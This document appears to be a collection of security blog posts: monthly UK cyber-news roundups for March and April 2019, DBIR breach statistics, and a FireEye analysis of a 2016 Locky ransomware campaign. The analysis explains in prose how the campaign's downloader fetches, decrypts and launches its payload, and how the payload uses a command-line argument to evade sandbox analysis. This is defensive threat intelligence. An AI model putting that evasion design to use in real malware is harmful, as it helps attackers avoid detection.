      • A third (32%) of breaches involved phishing
      • The nation-state threat is increasing, with 23% of breaches by nation-state actors
      • More than half (56%) of data breaches took months or longer to discover
      • Ransomware remains a major threat, and is the second most common type of malware reported
      • Business executives are increasingly targeted with social engineering, attacks such as phishing\BEC
      • Crypto-mining malware accounts for less than 5% of data breaches, despite the publicity it didn’t make the top ten malware listed in the report
      • Espionage is a key motivation behind a quarter of data breaches
      • 60 million records breached due to misconfigured cloud service buckets
      • Continued reduction in payment card point of sale breaches
      • The hacktivist threat remains low, the increase of hacktivist attacks report in DBIR 2012 report appears to be a one-off spike

Cyber Security Roundup for April 2019

The UK government controversially gave a green light to Huawei get involved with the building of the UK's 5G networks, although the Chinese tech giant role will be limited to non-sensitive areas of the network, such as providing antennas. This decision made by Theresa May came days after US intelligence announced Huawei was Chinese state funded, and amidst reports historical backdoors in Huawei products, stoking up the Huawei political and security row even further this month, and has resulted in the UK Defence Secretary, Gavin Williamson, being sacked. 
The National Cyber Security Centre (NCSC) launched a free online tool called "Exercise in a Box", designed by the UK cyber intelligence boffins to help organisations prepare in managing major cyber attacks.  The premise, is the tool will help UK organisations avoid scenarios such as the 2017’s Wannacry attacks, which devastated NHS IT systems and placed patient lives at risk.
 
German drug manufacturing giant, Beyer, found a malware infection, said to originate from a Chinese group called "Wicked Panda".  The malware in question was WINNIT, which is known in the security industry and allows remote access into networks, allowing hackers to deliver further malware and to conduct exploits. In my view, the presence of WINNIT is a sure sign a covert and sustained campaign by a sophisticated threat actor, likely focused on espionage given the company's sector.  Beyer stressed there was no evidence of data theft, but were are still investigating. 
 
Another manufacturing giant severely hit by a cyber attack this month was Aebi Schmidt. A ransomware outbreak impacted its business' operations globally, with most of the damage occurring at their European base. The ransomware wasn't named, but it left multiple Windows systems, on their presumably flat network infrastructure, paralyzed.
 
Facebook may have announced the dawn of their "privacy evolution" at the end of April, but their privacy woes still continue, after Upguard researchers found and reported 540 Million Facebook member records on an unsecured AWS S3 bucket. The "Cultura Colectiva" dataset contained 146GB of data with 540 million records showing comments, likes, reactions, account names, Facebook IDs and more. Looks like Facebook really have their work cut in restoring their consumer's faith in protecting their privacy.
 
UK businesses saw a significant increase in cyber attacks in 2019 according to a report by insurer Hiscox, with 55% of respondents reporting they had faced a cyber attack in 2019, up from 40% from last year.
 
A survey by the NCSC concluded most UK users are still using weak passwords. Released just before CyberUK 2019 conference in Glasgow, which I was unable attend due work commitments, said the most common password on breached accounts was"123456", used by 23.2 million accounts worldwide. Next on the list was "123456789" and "qwerty", "password" and "1111111".  Liverpool was the most common Premier League Football team used as a password, with Blink 182 the most common music act. The NCSC also published a separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches. So password still remains the biggest Achilles' heel with our security.

The UK hacktivist threat came back to the fore this month, after the Anonymous Group took revenge on the UK government for arresting WikiLeaks founder Julian Assange, by attacking Yorkshire Councils. I am not sure what Yorkshire link with Assange actually is, but the website for Barnsley Council was taken down by a DDoS attack, a tweet from the group CyberGhost404 linked to the crashed Barnsley Council website and said "Free Assange or chaos is coming for you!". A tweet from an account called 'Anonymous Espana' with an image, suggested they had access to Bedale Council's confidential files, and were threatening to leak them. 
 
Microsoft Outlook.com, Hotmail and MSN users are reported as having their accounts compromised. TechCrunch revealed the breach was caused due to the hackers getting hold of a customer support tech's login credentials. Over two million WiFi passwords were found exposed on an open database by the developer of WiFi Finder. The WiFi Finder App helps to find and log into hotspots.  Two in every three hotel websites leak guest booking details and personal data according to a report. Over 1,500 hotels in 54 countries failed to protect user information.
 
Finally, but not lest, a great report by Recorded Future on the raise of the dark web business of credential stuffing, titled "The Economy of Credential Stuffing Attacks". The report explains how low-level criminals use automated 'checkers' tools to validate compromised credentials, before selling them on.

I am aware of school children getting sucked into this illicit world, typically starts with them seeking to take over better online game accounts after their own account is compromised, they quickly end up with more money than they can spend. Aside from keeping an eye on what your children are up to online as a parent, it goes to underline the importance of using unique complex passwords with every web account (use a password manager or vault to help you - see password security section on the Security Expert website). And always use Multi-Factor Authentication where available, and if you suspect or have are informed your account 'may' have compromised, change your password straight away.

BLOG
 NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored the US calls to ban Huawei in 5G rollouts, while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing.  Meanwhile, Microsoft Researchers found an NSA-style Backdoor in Huawei Laptops, which was reported to Huawei by Microsoft, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank provided 'Heimdal Thor', security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote injection commands at the customer's endpoint. PenTest Partners said "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups.
 
Facebook made negative security headlines yet against after they disclosed that 20,000 of their employees had access to hundreds of millions of their user account passwords for years.

One of the world’s biggest aluminium producers, 
Norsk Hydrosuffered production outages after a ransomware outbreak impacted its European and US operations.  Damages from ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement it had taken action to contain the breach, “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”.  According to security firm Resecurity, the attacks were perpetrated by Iranian-linked group known as IRIDIUM.

Credit monitoring Equifax admitted in a report it didn't follow its own patching schedule, neglecting to patch Apache Struts which led to a major 2017 breach which impacted 145 million people.  The report also said Equifax delayed alerting their customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India – (Open third party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests PII
  4. Exactis – (Open device) 340 million people and businesses.
  5. HuaZhu Group – (Accidental Exposure) 240 million records
  6. Apollo – (Open device) 150 million app users.
  7. Quora – (Hacked) 100 million users.
  8. Google+ – (API Glitch) 52.2 million users.
  9. Chegg – (Hacked) 40 million accounts 
  10. Cathay Pacific Airways (Targeted attack) 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.
BLOG
NEWS

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample shown is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in program crash as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes

2cdf62f8aae20026418f143895c769a2009e6b9b3ac59bfa8fc79ca2f326b93a

1fd5c1f0ecc1d54324f3bdc327e7893032482a13c0914ef6f531bd93caef0a06

0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06

22645be8553628574a7af3c32a45178e201e9af33b20b36d29b9c012b731da4c

198d8d1a89221c575d957c1f4342741f3675ebb10f95ffe3371150e124f4850e